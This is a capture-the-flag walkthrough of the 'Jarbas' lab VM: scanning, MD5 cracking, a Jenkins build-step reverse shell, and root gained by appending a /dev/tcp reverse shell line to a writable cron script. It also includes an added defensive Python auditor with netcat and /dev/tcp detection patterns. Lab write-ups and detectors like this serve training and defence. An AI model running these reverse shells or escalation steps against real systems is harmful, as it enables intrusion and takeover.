1. Host Discovery
Check the local host's IP address. In my setup the eth1 interface is on the same network as the target.
```plain
┌──(kali㉿kali)-[~/桌面]
└─$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:0a:61:9a brd ff:ff:ff:ff:ff:ff
    inet 192.168.11.224/24 brd 192.168.11.255 scope global dynamic eth0
       valid_lft 84946sec preferred_lft 84946sec
    inet6 fe80::20c:29ff:fe0a:619a/64 scope link proto kernel_ll
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:0a:61:a4 brd ff:ff:ff:ff:ff:ff
    inet 192.168.16.128/24 brd 192.168.16.255 scope global dynamic noprefixroute eth1
       valid_lft 257832sec preferred_lft 257832sec
    inet6 fe80::20c:29ff:fe0a:61a4/64 scope link noprefixroute
       valid_lft forever preferred_lft forever
```
Use arp-scan and nmap to find the live hosts. After excluding Kali's own IP, the target's IP is confirmed as 192.168.16.132.
```plain
┌──(kali㉿kali)-[~/桌面]
└─$ sudo arp-scan --interface=eth1 -l
[sudo] kali 的密码:
Interface: eth1, type: EN10MB, MAC: 00:0c:29:0a:61:a4, IPv4: 192.168.16.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.16.1    00:50:56:c0:00:08   VMware, Inc.
192.168.16.2    00:50:56:f8:96:9c   VMware, Inc.
192.168.16.132  00:0c:29:6d:83:4e   VMware, Inc.
192.168.16.254  00:50:56:ed:76:cc   VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.089 seconds (122.55 hosts/sec). 4 responded

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sn 192.168.16.0/24
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-02 10:36 CST
Stats: 0:00:03 elapsed; 0 hosts completed (0 up), 255 undergoing ARP Ping Scan
Parallel DNS resolution of 4 hosts. Timing: About 0.00% done
Nmap scan report for 192.168.16.1
Host is up (0.00014s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.16.2
Host is up (0.000088s latency).
MAC Address: 00:50:56:F8:96:9C (VMware)
Nmap scan report for 192.168.16.132
Host is up (0.00010s latency).
MAC Address: 00:0C:29:6D:83:4E (VMware)
Nmap scan report for 192.168.16.254
Host is up (0.00013s latency).
MAC Address: 00:50:56:ED:76:CC (VMware)
Nmap scan report for 192.168.16.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 5.99 seconds
```
2. Information Gathering
Scan for open ports
```plain
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p- 192.168.16.132
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-05 12:35 CST
Nmap scan report for 192.168.16.132
Host is up (0.00065s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
8080/tcp open  http-proxy
MAC Address: 00:0C:29:6D:83:4E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.61 seconds
```
Extract the discovered ports so they can be reused in later commands.
```plain
┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ grep open ports.nmap | awk -F '/' '{print $1}' | paste -sd ','
22,80,3306,8080

┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ prots=$(grep open ports.nmap | awk -F '/' '{print $1}' | paste -sd ',')

┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ echo $prots
22,80,3306,8080
```
Scan the services on those ports. On port 80 nmap reports that the target runs CentOS with PHP 5.4.16, the MySQL service is MariaDB, and the kernel version is probably in the 3.2 to 4.9 range.

| Port | Version |
|---|---|
| 22 | OpenSSH 7.4 |
| 80 | Apache/2.4.6 |
| 3306 | mysql |
| 8080 | http-proxy |
```plain
┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ sudo nmap -sT --min-rate 10000 -sV -sC -O -p $prots   # press Tab to expand $prots into the port list

┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ sudo nmap -sT --min-rate 10000 -sV -sC -O -p 22,80,3306 -oA detail 192.168.16.132
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-02 11:31 CST
Nmap scan report for 192.168.16.132
Host is up (0.00058s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 28:bc:49:3c:6c:43:29:57:3c:b8:85:9a:6d:3c:16:3f (RSA)
|   256 a0:1b:90:2c:da:79:eb:8f:3b:14:de:bb:3f:d2:e7:3f (ECDSA)
|_  256 57:72:08:54:b7:56:ff:c3:e6:16:6f:97:cf:ae:7f:76 (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Jarbas - O Seu Mordomo Virtual!
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
3306/tcp open  mysql   MariaDB (unauthorized)
MAC Address: 00:0C:29:6D:83:4E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.37 seconds
```
Scan the top 20 UDP ports as well: only port 68 comes back as open|filtered, and nothing else useful turns up.
```plain
┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ sudo nmap -sU -top-ports 20 192.168.16.132 -oA udpscan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-02 11:44 CST
Nmap scan report for 192.168.16.132
Host is up (0.00046s latency).

PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    closed        dhcps
68/udp    open|filtered dhcpc
69/udp    closed        tftp
123/udp   closed        ntp
135/udp   closed        msrpc
137/udp   closed        netbios-ns
138/udp   closed        netbios-dgm
139/udp   closed        netbios-ssn
161/udp   closed        snmp
162/udp   closed        snmptrap
445/udp   closed        microsoft-ds
500/udp   closed        isakmp
514/udp   closed        syslog
520/udp   closed        route
631/udp   closed        ipp
1434/udp  closed        ms-sql-m
1900/udp  closed        upnp
4500/udp  closed        nat-t-ike
49152/udp closed        unknown
MAC Address: 00:0C:29:6D:83:4E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 19.06 seconds
```
Next, run nmap's vulnerability scripts to probe the target for likely weaknesses. They find a robots.txt file on the 8080 service (the dos script category is excluded by default).
```plain
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p 22,80,3306,8080 192.168.16.132
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-05 13:06 CST
Nmap scan report for 192.168.16.132
Host is up (0.00028s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.16.132
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://192.168.16.132:80/
|     Form id: wmtb
|     Form action: /web/submit
|
|     Path: http://192.168.16.132:80/
|     Form id:
|     Form action: /web/20020720170457/http://jarbas.com.br:80/user.php
|
|     Path: http://192.168.16.132:80/
|     Form id:
|_    Form action: /web/20020720170457/http://jarbas.com.br:80/busca/
| http-enum:
|_  /icons/: Potentially interesting folder w/ directory listing
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
3306/tcp open  mysql
8080/tcp open  http-proxy
| http-enum:
|_  /robots.txt: Robots file
MAC Address: 00:0C:29:6D:83:4E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 38.34 seconds
```
3. Finding Vulnerabilities
First, look at what is running on port 80. I could not tell what the site is for, but that does not matter: I tried every place on the page that exchanges data and found no real functionality, although the site looks like it was built on a framework.

Check what the service on port 8080 is. Visiting it shows an administrator back-end login page; the top-left corner shows the CMS framework in use is "Jenkins", and the bottom-right corner shows the current Jenkins version.
Check the content of robots.txt under the 8080 service: robots are told not to click the "build" link.
Then scan for directories with gobuster and dirb; no valuable directories or files are found.
```plain
┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.16.132/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.16.132/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================

┌──(kali㉿kali)-[~]
└─$ sudo dirb http://192.168.16.132

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Apr  5 13:26:31 2025
URL_BASE: http://192.168.16.132/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.16.132/ ----
+ http://192.168.16.132/cgi-bin/ (CODE:403|SIZE:210)
+ http://192.168.16.132/index.html (CODE:200|SIZE:32808)

-----------------
END_TIME: Sat Apr  5 13:26:33 2025
DOWNLOADED: 4612 - FOUND: 2
```
Run gobuster again with a different wordlist and with file extensions specified to see whether anything else turns up. This finds a new HTML file, access.html.
```plain
┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.16.132/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x html,php
[sudo] kali 的密码:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.16.132/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 32808]
/.html                (Status: 403) [Size: 207]
/access.html          (Status: 200) [Size: 359]
/.html                (Status: 403) [Size: 207]
Progress: 661680 / 661683 (100.00%)
===============================================================
Finished
===============================================================
```
Visiting access.html, the page title hints that these are usernames and passwords. Since each password is a 32-digit hexadecimal string, they are most likely MD5 hashes.

Use hash-identifier to confirm the hash type: all three are indeed MD5.
```plain
┌──(kali㉿kali)-[~]
└─$ sudo hash-identifier
--------------------------------------------------
HASH: 5978a63b4654c73c60fa24f836386d87

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128
[+] RipeMD-128(HMAC)
[+] SNEFRU-128
[+] SNEFRU-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] md5($pass.$salt)
[+] md5($salt.$pass)
[+] md5($salt.$pass.$salt)
[+] md5($salt.$pass.$username)
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($salt.$pass))
[+] md5($salt.md5(md5($pass).$salt))
[+] md5($username.0.$pass)
[+] md5($username.LF.$pass)
[+] md5($username.md5($pass).$salt)
[+] md5(md5($pass))
[+] md5(md5($pass).$salt)
[+] md5(md5($pass).md5($salt))
[+] md5(md5($salt).$pass)
[+] md5(md5($salt).md5($pass))
[+] md5(md5($username.$pass).$salt)
[+] md5(md5(md5($pass)))
[+] md5(md5(md5(md5($pass))))
[+] md5(md5(md5(md5(md5($pass)))))
[+] md5(sha1($pass))
[+] md5(sha1(md5($pass)))
[+] md5(sha1(md5(sha1($pass))))
[+] md5(strtoupper(md5($pass)))
--------------------------------------------------
HASH: f463f63616cb3f1e81ce46b39f882fd5

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128
[+] RipeMD-128(HMAC)
[+] SNEFRU-128
[+] SNEFRU-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] md5($pass.$salt)
[+] md5($salt.$pass)
[+] md5($salt.$pass.$salt)
[+] md5($salt.$pass.$username)
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($salt.$pass))
[+] md5($salt.md5(md5($pass).$salt))
[+] md5($username.0.$pass)
[+] md5($username.LF.$pass)
[+] md5($username.md5($pass).$salt)
[+] md5(md5($pass))
[+] md5(md5($pass).$salt)
[+] md5(md5($pass).md5($salt))
[+] md5(md5($salt).$pass)
[+] md5(md5($salt).md5($pass))
[+] md5(md5($username.$pass).$salt)
[+] md5(md5(md5($pass)))
[+] md5(md5(md5(md5($pass))))
[+] md5(md5(md5(md5(md5($pass)))))
[+] md5(sha1($pass))
[+] md5(sha1(md5($pass)))
[+] md5(sha1(md5(sha1($pass))))
[+] md5(strtoupper(md5($pass)))
--------------------------------------------------
HASH: 9b38e2b1e8b12f426b0d208a7ab6cb98

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128
[+] RipeMD-128(HMAC)
[+] SNEFRU-128
[+] SNEFRU-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] md5($pass.$salt)
[+] md5($salt.$pass)
[+] md5($salt.$pass.$salt)
[+] md5($salt.$pass.$username)
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($salt.$pass))
[+] md5($salt.md5(md5($pass).$salt))
[+] md5($username.0.$pass)
[+] md5($username.LF.$pass)
[+] md5($username.md5($pass).$salt)
[+] md5(md5($pass))
[+] md5(md5($pass).$salt)
[+] md5(md5($pass).md5($salt))
[+] md5(md5($salt).$pass)
[+] md5(md5($salt).md5($pass))
[+] md5(md5($username.$pass).$salt)
[+] md5(md5(md5($pass)))
[+] md5(md5(md5(md5($pass))))
[+] md5(md5(md5(md5(md5($pass)))))
[+] md5(sha1($pass))
[+] md5(sha1(md5($pass)))
[+] md5(sha1(md5(sha1($pass))))
[+] md5(strtoupper(md5($pass)))
--------------------------------------------------
HASH:
```
Store the usernames and hashes in user.hash and run john against them with a wordlist. This recovers two users' passwords; the third was cracked with an online tool.

| Username | Password |
|---|---|
| tiago | italia99 |
| trindade | marianna |
| eder | vipsu |

```plain
┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ sudo john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt user.hash
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 3 password hashes with no different salts (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=12
Press 'q' or Ctrl-C to abort, almost any other key for status
marianna         (trindade)
italia99         (tiago)
2g 0:00:00:00 DONE (2025-04-05 15:31) 2.564g/s 18388Kp/s 18388Kc/s 19227KC/s fuckyooh21..7¡Vamos!
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.
```
Logging in over SSH with these credentials failed, so go back to the back-end login page found earlier and log in as "eder:vipsu", which succeeds.
Click "New Item" to create a new project, choose Freestyle project, give it any name, and click OK.
After it is created you are redirected to this page.
Scroll down to the "Build" section; its dropdown lets you choose the type of build step. This target runs Linux, so choose "Execute shell".
Enter the reverse shell as the build command, then save.
Before executing the reverse shell, start a listener on port 1234 on Kali.
```plain
┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ sudo nc -lvnp 1234
[sudo] kali 的密码:
listening on [any] 1234 ...
```
Click Build Now to execute the reverse shell; the shell comes back successfully.
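From the defender's side, the step above is the thing to watch for: any account allowed to configure a job can run arbitrary commands as the Jenkins service user. As an added example (not part of this write-up), the script below audits a freestyle job's config.xml for "Execute shell" steps that contain bash network redirections, interactive shells or netcat; the sample config is constructed, and the element names `hudson.tasks.Shell` and `command` are the ones Jenkins writes for this build step type.

```python
"""Audit Jenkins freestyle job definitions for risky 'Execute shell' steps.

Added example, not part of the original write-up. Jenkins stores each
freestyle job as $JENKINS_HOME/jobs/<name>/config.xml and records an
'Execute shell' build step as
<builders><hudson.tasks.Shell><command>...</command></hudson.tasks.Shell></builders>.
The sample config below is constructed for this demonstration.
"""
import re
import xml.etree.ElementTree as ET

# Patterns a build step should never need: bash's /dev/tcp redirection
# (the technique used in this write-up), an interactive bash, and netcat.
RISKY_PATTERNS = {
    "dev_tcp_redirect": re.compile(r"/dev/(tcp|udp)/"),
    "interactive_bash": re.compile(r"\b(ba)?sh\s+-i\b"),
    "netcat": re.compile(r"\b(nc|ncat|netcat)\b"),
}

# Constructed sample: one benign step and one modelled on the build step above.
SAMPLE_CONFIG = """<project>
  <description>constructed sample job</description>
  <builders>
    <hudson.tasks.Shell>
      <command>make test</command>
    </hudson.tasks.Shell>
    <hudson.tasks.Shell>
      <command>/bin/bash -i &gt;&amp; /dev/tcp/192.168.16.128/1234 0&gt;&amp;1</command>
    </hudson.tasks.Shell>
  </builders>
</project>
"""


def shell_steps(config_xml):
    """Return the command text of every 'Execute shell' build step."""
    root = ET.fromstring(config_xml)
    return [(step.findtext("command") or "").strip()
            for step in root.iter("hudson.tasks.Shell")]


def risky_steps(config_xml):
    """Return (pattern_name, command) for each step that matches a risky pattern."""
    findings = []
    for cmd in shell_steps(config_xml):
        for name, pat in RISKY_PATTERNS.items():
            if pat.search(cmd):
                findings.append((name, cmd))
                break  # one finding per step is enough
    return findings


if __name__ == "__main__":
    for name, cmd in risky_steps(SAMPLE_CONFIG):
        print(f"[{name}] {cmd}")
```

Run it over every jobs/*/config.xml under JENKINS_HOME to find such steps; the lasting fix is to restrict Job/Configure to trusted accounts rather than to pattern-match commands.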
4. Privilege Escalation
Check the current username, the distribution release and our privileges. This system user has no sudo rights, and the release could not be determined.
```plain
bash-4.2$ whoami
whoami
jenkins
bash-4.2$ id
id
uid=997(jenkins) gid=995(jenkins) groups=995(jenkins) context=system_u:system_r:initrc_t:s0
bash-4.2$ uname -a
uname -a
Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
bash-4.2$ sudo -l
sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

sudo: no tty present and no askpass program specified
```
Check whether passwd and shadow can be read: only passwd is readable.
```plain
bash-4.2$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:997:User for polkitd:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false
bash-4.2$ cat /etc/shadow
cat /etc/shadow
cat: /etc/shadow: Permission denied
```
First look at the system's scheduled tasks for something usable. On Linux, /etc/cron.d is a directory holding system-level cron jobs, so start by listing the files in it. There is one file, 0hourly, and reading it shows that it runs the scripts in /etc/cron.hourly. That directory contains 0anacron, but that file is a power-source check script: before doing anything it checks whether it has already run today and exits if so, and in any case we have no write permission on it.
```plain
bash-4.2$ cat /etc/cron.d
cat /etc/cron.d
cat: /etc/cron.d: Is a directory
bash-4.2$ cd /etc/cron.d
cd /etc/cron.d
bash-4.2$ ls
ls
0hourly
bash-4.2$ cat 0hourly
cat 0hourly
# Run the hourly jobs
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
01 * * * * root run-parts /etc/cron.hourly
bash-4.2$ ls -l
ls -l
total 4
-rw-r--r--. 1 root root 128 Aug  3  2017 0hourly
bash-4.2$ cd /etc/cron.hourly
cd /etc/cron.hourly
bash-4.2$ ls
ls
0anacron
bash-4.2$ cat 0anacron
cat 0anacron
#!/bin/sh
# Check whether 0anacron was run today already
if test -r /var/spool/anacron/cron.daily; then
    day=`cat /var/spool/anacron/cron.daily`
fi
if [ `date +%Y%m%d` = "$day" ]; then
    exit 0;
fi

# Do not run jobs when on battery power
if test -x /usr/bin/on_ac_power; then
    /usr/bin/on_ac_power >/dev/null 2>&1
    if test $? -eq 1; then
    exit 0
    fi
fi
/usr/sbin/anacron -s
bash-4.2$ ls -l
ls -l
total 4
-rwxr-xr-x. 1 root root 392 Aug  3  2017 0anacron
```
Take another route. cron.d is of course not the only place Linux keeps system scheduled tasks; /etc/crontab serves the same purpose. Check /etc/crontab: first its permissions (we cannot write to it), then its content. Every five minutes it runs CleaningScript.sh from the script directory and discards the output. Checking the permissions on CleaningScript.sh, we do have write access, so if we can write a reverse shell into it, cron will execute it for us. Looking at its content, it is a script that deletes a log file.
```plain
bash-4.2$ ls -l crontab
ls -l crontab
-rw-r--r--. 1 root root 513 Apr  1  2018 crontab
bash-4.2$ cat /etc/crontab
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
bash-4.2$ cd /etc/script
cd /etc/script
bash-4.2$ ls -l
ls -l
total 4
-rwxrwxrwx. 1 root root 50 Apr  1  2018 CleaningScript.sh
bash-4.2$ cat CleaningScript.sh
cat CleaningScript.sh
#!/bin/bash
rm -rf /var/log/httpd/access_log.txt
```
First start a listener on port 2233 for the reverse connection, then append a reverse shell to CleaningScript.sh. Since crontab runs it every five minutes, this may take a little while.
```plain
┌──(kali㉿kali)-[~]
└─$ sudo nc -lnvp 2233
listening on [any] 2233 ...

bash-4.2$ echo "/bin/bash -i >& /dev/tcp/192.168.16.128/2233 0>&1" >> /etc/script/CleaningScript.sh
<i >& /dev/tcp/192.168.16.128/2233 0>&1" >> /etc/script/CleaningScript.sh
bash-4.2$ cat CleaningScript.sh
cat CleaningScript.sh
#!/bin/bash
rm -rf /var/log/httpd/access_log.txt
/bin/bash -i >& /dev/tcp/192.168.16.128/2233 0>&1
```
The reverse shell connects back and we have root.
```plain
┌──(kali㉿kali)-[~]
└─$ sudo nc -lnvp 2233
[sudo] kali 的密码:
listening on [any] 2233 ...
connect to [192.168.16.128] from (UNKNOWN) [192.168.16.132] 58976
bash: no job control in this shell
[root@jarbas ~]# whoami
whoami
root
[root@jarbas ~]# id
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:system_cronjob_t:s0-s0:c0.c1023
[root@jarbas ~]#
```
Read the flag
```plain
[root@jarbas ~]# cd /root
cd /root
[root@jarbas ~]# ls
ls
flag.txt
[root@jarbas ~]# cat flag.txt
cat flag.txt
Hey!

Congratulations! You got it! I always knew you could do it!
This challenge was very easy, huh? =)

Thanks for appreciating this machine.

@tiagotvrs
[root@jarbas ~]#
```
Summary
Scanning the target with nmap finds ports 22, 80, 3306 and 8080 open. Port 80 serves a news-like website with no real interactive functionality, so attention moves to the service on 8080. It is a back-end management page, and at this point we have no username or password. The robots.txt file reported by the nmap vulnerability scan says not to click the "build" link. Directory scanning with gobuster and dirb finds nothing, but running gobuster again with the html and php extensions finds the "access.html" page, which lists three users with MD5-hashed passwords. The three passwords are cracked with john and an online tool, and of the three only the eder user can log in to the back end. After login we land on the Jenkins project management page: click "New Item", choose Freestyle project, and under the "Build" section choose "Execute shell" to build a reverse shell. The shell we get runs as a system user with no sudo rights, so we look for scheduled task files. The /etc/cron.d directory contains 0hourly, which runs the scripts in cron.hourly; that directory contains 0anacron, which we cannot write to, so we move on to the next scheduler file, crontab. Its content runs CleaningScript.sh every five minutes, and we happen to have write access to CleaningScript.sh. Append a reverse shell to it, listen on the chosen port on Kali, and after a short wait the reverse shell arrives.